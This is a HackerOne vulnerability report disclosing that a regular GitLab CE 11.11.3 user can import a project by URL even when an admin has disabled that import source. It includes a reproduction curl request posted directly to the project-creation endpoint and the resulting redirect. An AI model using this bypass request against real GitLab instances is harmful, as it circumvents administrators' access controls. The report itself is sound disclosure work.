**[HackerOne report #630263](https://hackerone.com/reports/630263)** by `ngalog` on 2019-06-26, assigned to `estrike`: ### Summary As an admin, you can disable Repo by URL project creation in admin page `https://:gitlab_instance/admin/application_settings` However the user can still import project using repo by url regardless of the setting ### Steps to reproduce - As an admin, disable `Repo by URL` import source in `/admin/application_settings/general` under ` Visibility and access controls`  - As a regular user, run the following curl command: ```bash curl 'http://gitlab.local/-/projects' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H "Cookie: $COOKIE" \ --data-raw "utf8=%E2%9C%93&authenticity_token=$VALID_AUTHENTICITY_TOKEN&project%5Bimport_url%5D=https%3A%2F%2Fgitlab.com%2Fgitlab-org%2Frelease-cli.git&project%5Bimport_url_user%5D=&project%5Bimport_url_password%5D=&project%5Bci_cd_only%5D=false&project%5Bname%5D=Importing+Even+If+Disabled&project%5Bnamespace_id%5D=7&project%5Bpath%5D=importing-even-if-disabled&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0" ``` This command sends a request equivalent to what happens when using the `Repo by URL` import methods in the UI. It will import the `gitlab-org/release-cli` project by URL. In my case I got the response ```html <html><body>You are being <a href="http://gitlab.local/attacker/importing-even-if-disabled">redirected</a>.</body></html> ``` and the project was imported anyway. ### Impact Bypass project creation despite the admin setting explcitily disallow it ### What is the current *bug* behavior? Bypass project creation despite the admin setting explcitily disallow it reproduced on gitlab CE 11.11.3 (gitlab-ce@e3eeb779d72006b9fbbaecf9f1d8fbd52a7d6383) ## Impact bypass project creation by repo by url